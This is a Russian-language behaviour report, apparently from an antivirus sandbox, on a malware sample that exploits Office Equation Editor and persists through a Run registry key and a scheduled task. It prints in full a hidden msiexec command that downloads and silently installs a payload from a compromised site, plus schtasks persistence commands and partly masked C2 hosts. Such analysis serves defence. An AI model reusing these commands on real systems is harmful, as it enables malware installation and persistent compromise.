Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'TECBGL' = '"%APPDATA%\Windata\STRNOE.exe"'
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\tecbgl.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i https://airdalat.com/wp-content/plugins/lzosib.msi /quiet
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\windata\strnoe.exe
Сетевая активность
TCP
- 'ai###lat.com':443
- 'se#####ses.awsmppl.com':9735
UDP
- DNS ASK ai###lat.com
- DNS ASK se#####ses.awsmppl.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msi675d.tmp'
- '%APPDATA%\windata\strnoe.exe'
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i https://airdalat.com/wp-content/plugins/lzosib.msi /quiet' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /tn TECBGL.exe /tr %APPDATA%\Windata\STRNOE.exe /sc minute /mo 1' (со скрытым окном)
- '%APPDATA%\windata\strnoe.exe' ' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\msiexec.exe' /i https://airdalat.com/wp-content/plugins/lzosib.msi /quiet
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /tn TECBGL.exe /tr %APPDATA%\Windata\STRNOE.exe /sc minute /mo 1
- '%WINDIR%\syswow64\schtasks.exe' /create /tn TECBGL.exe /tr %APPDATA%\Windata\STRNOE.exe /sc minute /mo 1
- '<SYSTEM32>\taskeng.exe' {829D3487-93E2-4003-ABD8-0A174ED68AF4} S-1-5-21-1960123792-2022915161-3775307078-1001:pzgljfxkqpy\user:Interactive:[1]
